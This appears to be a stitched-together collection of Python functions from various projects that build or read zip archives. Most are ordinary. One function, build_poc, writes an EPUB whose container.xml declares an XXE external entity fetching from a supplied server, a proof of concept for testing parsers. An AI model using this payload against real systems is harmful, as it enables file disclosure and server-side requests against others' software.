def zipdir(archivename, basedir):
    '''Zip the files below *basedir* into the archive *archivename*.

    Adapted from J.F. Sebastian, http://stackoverflow.com/

    Every regular file found by walking ``basedir`` is stored under its path
    relative to ``basedir``.  Files whose names end in ``.zip`` are skipped,
    and empty directories are not recorded because only files are written.
    '''
    assert os.path.isdir(basedir)
    with closing(ZipFile(archivename, "w", ZIP_DEFLATED)) as z:
        for root, dirs, files in os.walk(basedir):
            #NOTE: ignore empty directories
            for fn in files:
                if fn.endswith('.zip'):
                    continue
                absfn = os.path.join(root, fn)
                # relpath stays correct when basedir ends with a separator;
                # slicing by len(basedir) + len(os.sep) would then cut off
                # the first character of every archive name.
                z.write(absfn, os.path.relpath(absfn, basedir))
# ================ Inventory input data and create data structure =================
# Example source code using Python's zipfile.ZIP_DEFLATED
def pickle_load(path, compression=False):
    """Load a pickled object from disk, optionally from inside a zip archive.

    Parameters
    ----------
    path: str
        path to the file to read
    compression: bool
        if true, `path` is opened as a zip archive and the pickle is read
        from the archive member named "data".

    Returns
    -------
    obj: object
        the unpickled object
    """
    # NOTE: unpickling can run arbitrary code; only load trusted files.
    if not compression:
        with open(path, "rb") as raw:
            return pickle.load(raw)
    with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as archive:
        with archive.open("data") as member:
            return pickle.load(member)
def prepare_zip():
    """Write ``gimel.zip`` in the current directory.

    The archive receives the JSON-serialised ``config`` as ``config.json``,
    the three packaged modules ``config.py``, ``gimel.py`` and ``logger.py``,
    and every file below the package's ``vendor`` directory, stored under its
    path relative to the package root.
    """
    from pkg_resources import resource_filename as resource
    from config import config
    from json import dumps
    logger.info('creating/updating gimel.zip')
    with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as bundle:
        config_entry = ZipInfo('config.json')
        # presumably the Unix mode bits (rw-rw-r--) stored in the upper half
        # of external_attr -- confirm against the zipfile documentation
        config_entry.external_attr = 0o664 << 16
        bundle.writestr(config_entry, dumps(config))
        for module in ('config.py', 'gimel.py', 'logger.py'):
            bundle.write(resource('gimel', module), module)
        for folder, _subdirs, names in os.walk(resource('gimel', 'vendor')):
            for name in names:
                source = os.path.join(folder, name)
                arcname = os.path.relpath(source, resource('gimel', ''))
                bundle.write(source, arcname)
def reseed(self, netdb):
    """Compress netdb entries and set content.

    Collects every ``.dat`` file below *netdb*, keeps a random sample of 75
    when more are available, zips them in memory (flat, by base name) and
    stores the archive bytes and its metadata on ``self``.  Raises
    ``PyseederException`` when no ``.dat`` file is found.
    """
    # TODO check modified time
    # may be not older than 10h
    candidates = [
        os.path.join(folder, name)
        for folder, _subdirs, names in os.walk(netdb)
        for name in names
        if name.endswith(".dat")
    ]
    if not candidates:
        raise PyseederException("Can't get enough netDb entries")
    if len(candidates) > 75:
        candidates = random.sample(candidates, 75)

    buf = io.BytesIO()
    with ZipFile(buf, "w", compression=ZIP_DEFLATED) as bundle:
        for entry in candidates:
            bundle.write(entry, arcname=os.path.basename(entry))

    self.FILE_TYPE = 0x00
    self.CONTENT_TYPE = 0x03
    self.CONTENT = buf.getvalue()
    self.CONTENT_LENGTH = len(self.CONTENT)
def __zip_function__(self):
    """
    Zip source code

    Creates the archive ``self.zip_name`` inside ``self.path``.  When
    ``self.virtual_env`` is set, its ``site-packages`` directory (or the
    environment root if none is found) is added through
    ``Lambda.zip_add_dir``; every entry of ``self.libraries`` is added the
    same way, and finally the function file ``self.function`` is written.
    :return:
    """
    archive_path = os.path.join(self.path, self.zip_name)
    PrintMsg.cmd('{}'.format(archive_path), 'ARCHIVING')
    # The context manager closes the archive even when adding a file fails.
    with zipfile.ZipFile(archive_path, 'w', zipfile.ZIP_DEFLATED) as zipf:
        if self.virtual_env:
            env_path = self.virtual_env
            for root, dirs, files in os.walk(self.virtual_env):
                # the last site-packages directory met during the walk wins
                if 'site-packages' in dirs:
                    env_path = os.path.join(root, 'site-packages')
            Lambda.zip_add_dir(env_path, zipf)
        for lib in self.libraries:
            Lambda.zip_add_dir(lib, zipf, True)
        zipf.write(os.path.join(self.path, self.function), self.function)
def load_full_log(self, filename, user=None, uid=None):
    """Return the content of the terminal log registered as *filename*.

    The acting user is *user* when it is a ``User`` instance, otherwise the
    user with id *uid*, otherwise ``self.user``.  Without a user the string
    ``'ERROR User(None)'`` is returned.

    The log record is looked up in ``self._lists`` when that is set, else in
    ``TermLog.objects``.  A record whose ``logPath`` is ``'locale'`` returns
    its ``log`` attribute directly; otherwise the first member of the zip
    archive at ``logPath`` is read using ``logPWD`` as the password.  A
    ``KeyError`` while reading yields an ``'ERROR: ...'`` string.
    """
    if not isinstance(user, User):
        user = User.objects.get(id=uid) if uid else self.user
    if not user:
        return 'ERROR User(None)'

    if self._lists:
        self.file = self._lists.get(filename=filename)
    else:
        self.file = TermLog.objects.get(filename=filename)

    if self.file.logPath == 'locale':
        return self.file.log

    try:
        # Close the archive deterministically instead of leaking the handle.
        with zipfile.ZipFile(self.file.logPath, 'r', zipfile.ZIP_DEFLATED) as zf:
            zf.setpassword(self.file.logPWD)
            self._data = zf.read(zf.namelist()[0])
        return self._data
    except KeyError:
        return 'ERROR: Did not find %s file' % filename
def ZipFiles(targetdir, ziparchivename):
    '''Create a zip archive of all files in the target directory.

    *targetdir* is either a directory path (``str``), which is walked
    recursively, or a ``list`` of file paths that are added as given.  The
    archive being written is never added to itself.  After writing, the
    archive is reopened and checked with ``testzip()``; a warning is printed
    when the check reports a bad member.
    '''
    #os.chdir(targetdir)
    archive_abspath = os.path.abspath(ziparchivename)
    with zipfile.ZipFile(ziparchivename, "w", zipfile.ZIP_DEFLATED) as myzip:
        if isinstance(targetdir, str):
            for root, dirs, files in os.walk(targetdir):
                for fname in files:
                    fpath = os.path.join(root, fname)
                    # The bare-name comparison is kept for compatibility; the
                    # absolute-path comparison also catches an archive that
                    # was given as a path located inside targetdir.
                    if (fname == ziparchivename
                            or os.path.abspath(fpath) == archive_abspath):
                        continue
                    myzip.write(fpath)
        elif isinstance(targetdir, list):
            for fname in targetdir:
                myzip.write(fname)
    with zipfile.ZipFile(ziparchivename, "r", zipfile.ZIP_DEFLATED) as myzip:
        if myzip.testzip() is not None:
            print("Warning: Zipfile did not pass check.")
def createZipWithProgress(zippath, files):
    """Same as function createZip() but has a stdout progress bar which is useful for commandline work

    The directory that will contain the archive is created when it does not
    exist yet.

    :param zippath: the file path for the zip file
    :type zippath: str
    :param files: A Sequence of (source path, archive name) pairs that will be archived.
    :type files: seq(seq(str))
    """
    target_dir = os.path.dirname(zippath)
    # dirname is empty for a bare file name; os.makedirs('') would raise, and
    # joining the directory onto itself created a bogus nested folder for
    # relative paths.
    if target_dir and not os.path.exists(target_dir):
        os.makedirs(target_dir)
    logger.debug("writing file: {}".format(zippath))
    progressBar = commandline.CommandProgressBar(len(files), prefix='Progress:', suffix='Complete', barLength=50)
    progressBar.start()
    with zipfile.ZipFile(zippath, "w", zipfile.ZIP_DEFLATED) as archive:
        for p in files:
            logger.debug("Archiving file: {} ----> :{}\n".format(p[0], p[1]))
            archive.write(p[0], p[1])
            progressBar.increment(1)
    logger.debug("finished writing zip file to : {}".format(zippath))
def format(self, parts, events, filename, *args):
    """Append the formatted events to *parts* as a zipped attachment.

    The wrapped ``self.formatter`` produces the text, which is UTF-8 encoded
    and stored as the single member of an in-memory zip.  When *filename*
    already ends in ``.zip`` (any case) it names the attachment and the
    member name drops that suffix; otherwise ``.zip`` is appended for the
    attachment and *filename* is used for the member.  Always returns an
    empty unicode string.
    """
    stem, suffix = os.path.splitext(filename)
    already_zip = suffix.lower() == ".zip"
    zip_name = filename if already_zip else filename + ".zip"
    raw_name = stem if already_zip else filename

    data = self.formatter.format(parts, events, *args)

    memfile = StringIO()
    zipped = zipfile.ZipFile(memfile, 'w', zipfile.ZIP_DEFLATED)
    zipped.writestr(raw_name, data.encode("utf-8"))
    zipped.close()

    part = MIMEBase("application", "zip")
    part.set_payload(memfile.getvalue())
    encode_base64(part)
    part.add_header("Content-Disposition", "attachment", filename=zip_name)
    parts.append(part)
    return u""
def makeZipFiles(self):
    """Create the zip fixtures in the current directory.

    Produces ``bigfile.zip`` (stored) and ``bigfile_deflated.zip`` (deflated)
    through ``self._makebigfile``, and ``littlefiles.zip`` holding 1000
    files ``zipstreamdir/0`` .. ``zipstreamdir/999`` created via ``stuff``
    with an empty string.  Ends by calling ``self.cleanupUnzippedJunk()``.
    """
    self._makebigfile('bigfile.zip', zipfile.ZIP_STORED)

    little_archive = zipfile.ZipFile('littlefiles.zip', 'w')
    try:
        os.mkdir('zipstreamdir')
    except EnvironmentError:
        # best effort: any failure to create the directory is ignored here
        pass
    for index in range(1000):
        member = 'zipstreamdir/%d' % index
        stuff(member, '')
        little_archive.write(member)
    little_archive.close()

    self._makebigfile('bigfile_deflated.zip', zipfile.ZIP_DEFLATED)
    self.cleanupUnzippedJunk()
def create_zip_file(self, file_name, args):
    """Build the deployment archive at ``Config.zip_file_path`` and return its bytes.

    The archive contains a copy of the supervisor script named
    ``file_name + '.py'``, the udocker script and the udocker tarball.  When
    ``args.script`` is set it is added as ``init_script.sh``; when
    ``args.extra_payload`` is set it is added through ``self.zipfolder``.
    The matching entries of ``Config.lambda_env_variables`` are updated.
    """
    # Set generic lambda function name
    function_name = file_name + '.py'
    # Copy file to avoid messing with the repo files
    # We have to rename because the function name affects the handler name
    shutil.copy(Config.dir_path + '/lambda/scarsupervisor.py', function_name)
    try:
        # Zip the function file
        with zipfile.ZipFile(Config.zip_file_path, 'w', zipfile.ZIP_DEFLATED) as zf:
            # Lambda function code
            zf.write(function_name)
            # Udocker script code
            zf.write(Config.dir_path + '/lambda/udocker', 'udocker')
            # Udocker libs
            zf.write(Config.dir_path + '/lambda/udocker-1.1.0-RC2.tar.gz', 'udocker-1.1.0-RC2.tar.gz')
            if getattr(args, 'script', None):
                zf.write(args.script, 'init_script.sh')
                Config.lambda_env_variables['Variables']['INIT_SCRIPT_PATH'] = "/var/task/init_script.sh"
    finally:
        # Remove the temporary copy even when building the archive fails.
        os.remove(function_name)
    if getattr(args, 'extra_payload', None):
        self.zipfolder(Config.zip_file_path, args.extra_payload)
        Config.lambda_env_variables['Variables']['EXTRA_PAYLOAD'] = "/var/task/extra/"
    # Return the zip as an array of bytes
    with open(Config.zip_file_path, 'rb') as f:
        return f.read()
def backup_theme(self, themename):
    '''backup a colortheme to a zipfile

    Asks for a destination folder; nothing happens when the dialog returns
    an empty path.  All files in ``self.userthemes_path`` whose name starts
    with ``"<themename>_"`` or equals the theme name once ``.theme`` /
    ``.jpg`` are removed are zipped into a temporary archive, which is then
    copied to the chosen folder.
    '''
    import zipfile
    backup_path = xbmcgui.Dialog().browse(3, self.addon.getLocalizedString(32029), "files").decode("utf-8")
    if not backup_path:
        return
    xbmc.executebuiltin("ActivateWindow(busydialog)")
    try:
        backup_name = u"%s ColorTheme - %s" % (get_skin_name().capitalize(), themename)
        backupfile = os.path.join(backup_path, backup_name + u".zip")
        zip_temp = u'special://temp/%s.zip' % backup_name
        xbmcvfs.delete(zip_temp)
        xbmcvfs.delete(backupfile)
        zip_temp = xbmc.translatePath(zip_temp).decode("utf-8")
        abs_src = os.path.abspath(xbmc.translatePath(self.userthemes_path).decode("utf-8"))
        zip_file = zipfile.ZipFile(zip_temp, "w", zipfile.ZIP_DEFLATED)
        try:
            for filename in xbmcvfs.listdir(self.userthemes_path)[1]:
                if (filename.startswith("%s_" % themename) or
                        filename.replace(".theme", "").replace(".jpg", "") == themename):
                    filename = filename.decode("utf-8")
                    filepath = xbmc.translatePath(self.userthemes_path + filename).decode("utf-8")
                    absname = os.path.abspath(filepath)
                    # archive name is the path below the themes folder
                    arcname = absname[len(abs_src) + 1:]
                    zip_file.write(absname, arcname)
        finally:
            # release the archive handle even if adding a file fails
            zip_file.close()
        xbmcvfs.copy(zip_temp, backupfile)
    finally:
        # always issue the close command, so an error does not skip it
        xbmc.executebuiltin("Dialog.Close(busydialog)")
def pickle_load(path, compression=False):
    """Read back a pickle that may have been stored inside a zip archive.

    Parameters
    ----------
    path: str
        path to the file to read
    compression: bool
        if true, `path` is treated as a zip archive whose member "data"
        holds the pickle.

    Returns
    -------
    obj: object
        the unpickled object
    """
    # NOTE: unpickling can run arbitrary code; only load trusted files.
    if compression:
        archive = zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED)
        with archive, archive.open("data") as stream:
            return pickle.load(stream)
    with open(path, "rb") as stream:
        return pickle.load(stream)
def run():
    """Download the URLs listed in ``URLS`` and zip the fetched files.

    Blank lines and lines starting with ``#`` in ``URLS`` are ignored.  The
    files are fetched into a temporary directory by ``download_all`` and
    every entry that has a file path is stored, deflated, in
    ``symbols-for-systemtests.zip`` under its URI with ``v1/`` removed.
    Total download time and size are accumulated along the way.
    """
    stripped_lines = (line.strip() for line in URLS.strip().splitlines())
    urls = [
        line
        for line in stripped_lines
        if line and not line.startswith('#')
    ]
    with tempfile.TemporaryDirectory(prefix='symbols') as tmpdirname:
        downloaded = download_all(urls, tmpdirname)
        save_filepath = 'symbols-for-systemtests.zip'
        total_time_took = 0.0
        total_size = 0
        with zipfile.ZipFile(save_filepath, mode='w') as bundle:
            for uri, (fullpath, time_took, size) in downloaded.items():
                total_time_took += time_took
                total_size += size
                if not fullpath:
                    # nothing was saved for this URI
                    continue
                assert os.path.isfile(fullpath)
                bundle.write(
                    fullpath,
                    arcname=uri.replace('v1/', ''),
                    compress_type=zipfile.ZIP_DEFLATED,
                )
def _upload(self, filename):
    """Zip *filename*, send it base64-encoded with the UPLOAD_FILE command.

    Returns the ``'value'`` of the command response.  When the remote end
    reports that it does not support the upload command, the local
    *filename* is returned unchanged; any other ``WebDriverException`` is
    re-raised.
    """
    fp = IOStream()
    zipped = zipfile.ZipFile(fp, 'w', zipfile.ZIP_DEFLATED)
    zipped.write(filename, os.path.split(filename)[1])
    zipped.close()
    # base64.encodestring was removed in Python 3.9; encodebytes is its
    # current name.  Fall back to the old name where encodebytes is missing.
    encode = getattr(base64, 'encodebytes', None) or base64.encodestring
    content = encode(fp.getvalue())
    if not isinstance(content, str):
        content = content.decode('utf-8')
    try:
        return self._execute(Command.UPLOAD_FILE,
                             {'file': content})['value']
    except WebDriverException as e:
        message = e.__str__()
        unsupported_markers = (
            "Unrecognized command: POST",
            "Command not found: POST ",
            '{"status":405,"value":["GET","HEAD","DELETE"]}',
        )
        if any(marker in message for marker in unsupported_markers):
            return filename
        # bare raise keeps the original traceback
        raise
def plaintext2zip(self, file_name, subdirname, plaintext):
    """Store *plaintext* as a one-member zip below the plaintext articles dir.

    The part of *file_name* before its first dot is used as the base name.
    The text is first written UTF-8 encoded to ``<base>.txt`` inside
    ``STATIC_PLAINTEXT_ARTICLES_DIR + subdirname`` (created when missing),
    then zipped into ``<base>.zip`` next to it, after which the ``.txt``
    file is removed.  Errors while zipping are printed and logged, not
    raised.
    """
    file_name = file_name.split('.')[0]
    target_dir = STATIC_PLAINTEXT_ARTICLES_DIR + subdirname
    plaintext_file_name = target_dir + '/' + file_name + '.txt'
    zip_file_name = target_dir + '/' + file_name + '.zip'
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    # the with-block flushes and closes the file on exit
    with codecs.open(plaintext_file_name, 'w', encoding='utf8') as outfile:
        outfile.write(plaintext)
    zf = zipfile.ZipFile(zip_file_name, mode='w', compression=zipfile.ZIP_DEFLATED)
    try:
        zf.write(plaintext_file_name, os.path.basename(plaintext_file_name))
        os.remove(plaintext_file_name)
    except Exception as e:
        # deliberate best effort: report the problem and carry on
        print(e)
        logging.error('zip error %s ' % plaintext_file_name)
    finally:
        zf.close()
def make_archive(folderpath, archive):
    """
    Create the zip *archive from the files below folder *folderpath.

    Files are stored under their path relative to the folder.  Skipped are:
    anything with a ``.git`` path component, files under ``media`` that are
    not ``.xbt``, anything under ``themes``, and ``.pyc``/``.pyo``/``.zip``
    files.  Each stored file is reported through ``logging.warning``.
    """
    skipped_suffixes = ('.pyc', '.pyo', '.zip')
    file_list = get_absolute_file_paths(folderpath)
    with zipfile.ZipFile(archive, 'w', zipfile.ZIP_DEFLATED) as bundle:
        for source in file_list:
            relative = os.path.relpath(source, folderpath)
            excluded = (
                ".git" in re.split(r'[\\/]', source)
                or (relative.startswith("media")
                    and not relative.endswith(".xbt"))
                or relative.startswith("themes")
                or source.endswith(skipped_suffixes)
                # NOTE(review): tests the full source path, not the file
                # name -- presumably meant to skip dot-files; confirm.
                or source.startswith('.')
            )
            if excluded:
                continue
            bundle.write(source, relative)
            logging.warning("zipped %s" % relative)
def updateZip(zipname, filename, data):
    """Replace (or add) the member *filename* of archive *zipname* with *data*.

    The archive is copied member by member, minus *filename*, into a
    temporary file created next to it; that copy then replaces the original
    and *filename* is appended with its new content (deflated).  The archive
    comment is preserved.  If the copy fails, the temporary file is removed
    and the original archive is left untouched.
    """
    # generate a temp file
    tmpfd, tmpname = tempfile.mkstemp(dir=os.path.dirname(zipname))
    os.close(tmpfd)
    # create a temp copy of the archive without filename
    copied = False
    try:
        with zipfile.ZipFile(zipname, 'r') as zin:
            with zipfile.ZipFile(tmpname, 'w') as zout:
                zout.comment = zin.comment  # preserve the comment
                for item in zin.infolist():
                    if item.filename != filename:
                        # read by ZipInfo so same-named entries stay distinct
                        zout.writestr(item, zin.read(item))
        copied = True
    finally:
        if not copied:
            # do not leave a stray temp file behind when the copy fails
            os.remove(tmpname)
    # replace with the temp archive
    os.remove(zipname)
    os.rename(tmpname, zipname)
    # now add filename with its new data
    with zipfile.ZipFile(zipname, mode='a', compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(filename, data)
def pickle_load(path, compression=False):
    """Unpickle an object stored either as a plain file or inside a zip.

    Parameters
    ----------
    path: str
        path to the file to read
    compression: bool
        if true, the pickle is read from the member "data" of the zip
        archive at `path`; otherwise `path` itself is the pickle file.

    Returns
    -------
    obj: object
        the unpickled object
    """
    # NOTE: unpickling can run arbitrary code; only load trusted files.
    if not compression:
        with open(path, "rb") as source:
            return pickle.load(source)
    with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as zf, \
            zf.open("data") as source:
        return pickle.load(source)
def _ArchiveOutputDir(self):
    """Zip every file below ``self._output_dir`` and return the archive bytes.

    Members are named by their path relative to the output dir.  The number
    of archived files is logged; an empty output dir logs a warning and
    still returns a valid (empty) archive.
    """
    with io.BytesIO() as buf:
        archived = 0
        with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as bundle:
            for folder, _, names in os.walk(self._output_dir):
                for name in names:
                    source = os.path.join(folder, name)
                    # relpath yields 'file.txt' (not './file.txt') for files
                    # that sit directly in the output dir.
                    bundle.write(source,
                                 os.path.relpath(source, self._output_dir))
                    archived += 1
        if archived:
            logging.info('%d files in the output dir were archived.', archived)
        else:
            logging.warning('No files in the output dir. Archive is empty.')
        return buf.getvalue()
def _write_zip(self):
    """Pack the generated document parts into the archive ``self.filename``.

    The manifest, content, meta, styles and mimetype files are added under
    their fixed archive names; afterwards the manifest, content, meta and
    styles source files are deleted.  Raises ``ReportError`` when the
    archive cannot be created.
    """
    try:
        archive = zipfile.ZipFile(self.filename, "w", zipfile.ZIP_DEFLATED)
    except IOError as msg:
        errmsg = "%s\n%s" % (_("Could not create %s") % self.filename, msg)
        raise ReportError(errmsg)
    except Exception:
        # not a bare except: KeyboardInterrupt/SystemExit must pass through
        raise ReportError(_("Could not create %s") % self.filename)

    try:
        archive.write(self.manifest_xml, str("META-INF/manifest.xml"))
        archive.write(self.content_xml, str("content.xml"))
        archive.write(self.meta_xml, str("meta.xml"))
        archive.write(self.styles_xml, str("styles.xml"))
        archive.write(self.mimetype, str("mimetype"))
    finally:
        # close the archive even when one of the parts cannot be added
        archive.close()

    # NOTE(review): self.mimetype is not removed here -- confirm whether
    # that file is cleaned up elsewhere.
    os.unlink(self.manifest_xml)
    os.unlink(self.content_xml)
    os.unlink(self.meta_xml)
    os.unlink(self.styles_xml)
def pickle_load(path, compression=False):
    """Return the object pickled at `path`, unzipping it first if requested.

    Parameters
    ----------
    path: str
        path to the file to read
    compression: bool
        if true, `path` is opened as a zip archive and the pickle is taken
        from its member "data".

    Returns
    -------
    obj: object
        the unpickled object
    """
    # NOTE: unpickling can run arbitrary code; only load trusted files.
    if compression:
        with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as container:
            with container.open("data") as payload:
                result = pickle.load(payload)
    else:
        with open(path, "rb") as payload:
            result = pickle.load(payload)
    return result
def dir2zip(in_dir, zip_fname):
    """ Make a zip file `zip_fname` with contents of directory `in_dir`

    The recorded filenames are relative to `in_dir`, so doing a standard zip
    unpack of the resulting `zip_fname` in an empty directory will result in
    the original directory contents.  Only files are recorded; empty
    directories are not.

    Parameters
    ----------
    in_dir : str
        Directory path containing files to go in the zip archive
    zip_fname : str
        Filename of zip archive to write
    """
    # The context manager closes the archive even if a file cannot be added.
    with zipfile.ZipFile(zip_fname, 'w',
                         compression=zipfile.ZIP_DEFLATED) as z:
        for root, dirs, files in os.walk(in_dir):
            for file in files:
                fname = os.path.join(root, file)
                z.write(fname, os.path.relpath(fname, in_dir))
def assemble_my_parts(self):
    """Assemble the `self.parts` dictionary.  Extend in subclasses.

    Builds the document archive in a temporary file and stores its bytes
    under ``parts['whole']``, together with the output encoding and the
    docutils version.  The ``mimetype`` member is written first and
    uncompressed; the remaining members use the archive default (deflate).
    """
    writers.Writer.assemble_parts(self)
    # Context managers release the temp file and archive even on errors.
    with tempfile.NamedTemporaryFile() as f:
        with zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED) as zfile:
            self.write_zip_str(zfile, 'mimetype', self.MIME_TYPE,
                               compress_type=zipfile.ZIP_STORED)
            content = self.visitor.content_astext()
            self.write_zip_str(zfile, 'content.xml', content)
            s1 = self.create_manifest()
            self.write_zip_str(zfile, 'META-INF/manifest.xml', s1)
            s1 = self.create_meta()
            self.write_zip_str(zfile, 'meta.xml', s1)
            s1 = self.get_stylesheet()
            self.write_zip_str(zfile, 'styles.xml', s1)
            self.store_embedded_files(zfile)
            self.copy_from_stylesheet(zfile)
        # the archive is closed (central directory written) before reading
        f.seek(0)
        whole = f.read()
    self.parts['whole'] = whole
    self.parts['encoding'] = self.document.settings.output_encoding
    self.parts['version'] = docutils.__version__
def build_poc(server):
    """Write ``poc.epub`` in the current directory for XXE testing.

    The archive holds a single ``META-INF/container.xml`` whose DOCTYPE
    declares an external entity pointing at ``http://<server>:9090/``.
    Intended for testing parsers you are authorised to assess.
    """
    # io.BytesIO holds the binary archive on both Python 2 and 3.
    from io import BytesIO
    xxe = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://%s:9090/">]>
<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
<rootfiles>
<rootfile full-path="content.opf" media-type="application/oebps-package+xml">&xxe;</rootfile>
</rootfiles>
</container>""" % server
    buf = BytesIO()
    z = zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED)
    zipinfo = zipfile.ZipInfo("META-INF/container.xml")
    # 0o777 is the octal spelling accepted by Python 2.6+ and 3; the old
    # "0777" / "16L" literals are syntax errors on Python 3.
    zipinfo.external_attr = 0o777 << 16
    z.writestr(zipinfo, xxe)
    z.close()
    with open('poc.epub', 'wb') as epub:
        epub.write(buf.getvalue())
def build_zip(self, pathname, archive_paths):
    """Write the deflated zip *pathname* from ``(archive name, source path)`` pairs.

    A debug message is logged for every pair just before it is added.
    """
    with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as bundle:
        for arcname, source in archive_paths:
            logger.debug('Wrote %s to %s in wheel', source, arcname)
            bundle.write(source, arcname)
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
                 mode='w'):
    """Create the zip file 'zip_filename' from all the files under 'base_dir'.

    The parent directory of 'zip_filename' is created through ``mkpath``.
    Files are stored under their path with the ``base_dir`` prefix removed,
    deflated when 'compress' is true and stored otherwise; 'mode' is passed
    to ``zipfile.ZipFile``.  With 'dry_run' set nothing is written, but the
    same files are walked and logged.  'verbose' is not used by this
    function.  Returns 'zip_filename'.
    """
    import zipfile

    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    if compress:
        compression = zipfile.ZIP_DEFLATED
    else:
        compression = zipfile.ZIP_STORED

    # No archive object exists during a dry run.
    archive = None
    if not dry_run:
        archive = zipfile.ZipFile(zip_filename, mode, compression=compression)

    for dirname, dirs, files in os.walk(base_dir):
        for name in files:
            path = os.path.normpath(os.path.join(dirname, name))
            if not os.path.isfile(path):
                continue
            # drop "<base_dir>/" from the front to get the archive name
            arcname = path[len(base_dir) + 1:]
            if archive is not None:
                archive.write(path, arcname)
            log.debug("adding '%s'", arcname)

    if archive is not None:
        archive.close()
    return zip_filename
def create_zip(cls, fname):
    """Create ``fname + ".zip"`` holding one freshly touched ``fname + ".txt"``.

    The ``.txt`` file is removed again once it has been archived.  Returns
    the path of the zip file.
    """
    zip_file = fname + ".zip"
    example_file = fname + ".txt"
    touch(example_file)
    bundle = zipfile.ZipFile(fname + ".zip", 'w', zipfile.ZIP_DEFLATED)
    bundle.write(example_file)
    bundle.close()
    os.remove(example_file)
    return zip_file
def archive(cls, path):
    """Creates a zip file containing the given directory.

    The archive is written to the system temp directory as
    ``<directory name>.zip``.  Entries (sub-directories and files) are stored
    under paths that start with the directory's own name.

    :param path: Path to the archived directory.
    :return: Path of the created zip file.
    """
    import zipfile

    # abspath normalises the path: a trailing separator no longer yields an
    # empty base name, and a bare relative name gets a real parent directory
    # (previously the parent became '/' and every archive name lost its
    # first character).
    path = os.path.abspath(path)
    parent_path = os.path.dirname(path)
    zip_path = os.path.join(tempfile.gettempdir(),
                            '%s.zip' % os.path.basename(path))

    z = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED,
                        allowZip64=True)
    try:
        for current_dir_path, dir_names, file_names in os.walk(path):
            # directories first, then files, as separate archive entries
            for entry_name in dir_names + file_names:
                entry_path = os.path.join(current_dir_path, entry_name)
                z.write(entry_path, os.path.relpath(entry_path, parent_path))
    finally:
        z.close()
    return zip_path
def build_zip(self, pathname, archive_paths):
    """Create the deflated archive *pathname* from *archive_paths*.

    *archive_paths* yields ``(name inside the archive, path on disk)``
    pairs; each pair is logged at debug level and then added.
    """
    with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf:
        for pair in archive_paths:
            inside_name, disk_path = pair
            logger.debug('Wrote %s to %s in wheel', disk_path, inside_name)
            zf.write(disk_path, inside_name)